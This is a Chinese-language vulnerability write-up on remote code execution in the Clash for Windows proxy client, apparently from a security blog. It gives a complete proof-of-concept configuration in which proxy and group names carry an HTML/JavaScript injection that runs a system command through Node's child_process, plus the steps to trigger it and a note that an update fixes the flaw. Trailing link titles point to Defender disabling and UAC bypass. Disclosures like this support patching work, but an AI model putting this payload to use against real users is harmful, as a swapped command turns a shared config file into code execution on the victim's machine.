Clash_for_windows远程代码执行

简介: Clash_for_windows远程代码执行

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。

影响版本

0.19.8(0.19.9版本还有(mac目前没发现)

POC

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

漏洞利用

1、导入POC配置文件
2、切换到"Profiles"
3、单击“Proxies”即可触发

修复建议

作者已发布了修复版本,下载更新即可
[https://github.com/Fndroid/clash_for_windows_pkg/releases](

目录
相关文章
|
6月前
|
安全 Windows
windows11 永久关闭windows defender的方法
windows11 永久关闭windows defender的方法
823 2
|
4月前
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
87 2
|
安全 数据安全/隐私保护 Windows
001-windows无法远程(1)
windows无法远程,报错是:为安全考虑,已锁定该用户账户,原因是登录尝试或密码更改尝试过多,请稍后片刻再重试,或与系统管理员或技术支持联系
001-windows无法远程(1)
|
缓存 Shell C#
后渗透之windows中远程下载文件tips
后渗透之windows中远程下载文件tips
|
Web App开发 安全 Shell
Chrome远程代码执行并移植MSF控制
Chrome远程代码执行并移植MSF控制
Chrome远程代码执行并移植MSF控制
|
安全 Windows Shell
DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396473 ...
1563 0
|
Python Windows
exe2hex - 使用Windows工具DEBUG.exe或PowerShell进行内联文件传输
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396425 ...
1526 0